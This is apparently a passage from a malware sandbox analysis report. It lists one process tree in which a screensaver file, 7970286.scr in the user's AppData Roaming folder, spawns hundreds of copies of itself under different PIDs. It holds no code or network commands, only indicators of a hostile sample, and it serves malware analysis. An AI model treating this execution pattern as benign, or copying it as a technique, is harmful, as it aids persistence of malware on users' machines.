C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9820
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9836
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9852
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9892
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9884
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9924
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9936
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9916
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9968
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9988
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10004
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10020
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10036
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10052
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10072
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10112
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10128
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10144
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10160
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10176
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10184
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10192
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10224
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9484
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2284
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2160
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3188
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10248
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10256
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10268
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10292
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10284
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10276
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3248
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9452
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2052
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2844
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5096
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4088
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10324
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10340
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10360
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10384
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10408
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10440
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10472
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10492
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10508
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10540
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10548
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10556
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10572
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10580
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10596
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10604
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10620
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10636
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10652
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10684
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10692
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10724
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10756
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10776
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10792
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10824
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10816
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10840
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10856
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10872
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10880
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10864
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10848
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10832
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10748
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10732
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10708
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10700
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10644
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10920
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10936
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10952
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10968
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10984
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11000
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11032
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11048
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11080
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11096
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11104
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11140
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11168
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11216
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11260
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:840
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3464
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2468
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10480
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2824
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9728
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2736
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2136
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:10680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11276
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11288
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11312
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11328
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11336
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11360
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11376
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11392
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11400
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11440
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11448
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11464
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11488
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11528
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11536
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11552
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11560
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11568
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11592
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11632
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11648
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11696
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11708
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11732
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11748
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11816
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11848
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11884
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11916
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11940
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11964
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11980
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11988
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:11996
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12012
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12020
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12068
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12084
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12092
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12100
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12108
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12124
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12144
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12160
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12196
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12204
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12236
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12252
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12292
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12316
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12324
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12348
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12364
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12388
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12396
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12404
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12412
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12420
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12428
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12436
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12444
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12452
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12460
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12476
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12484
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12492
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12500
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12508
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12524
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12540
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12556
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12564
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12624
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12648
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:12688
-
-
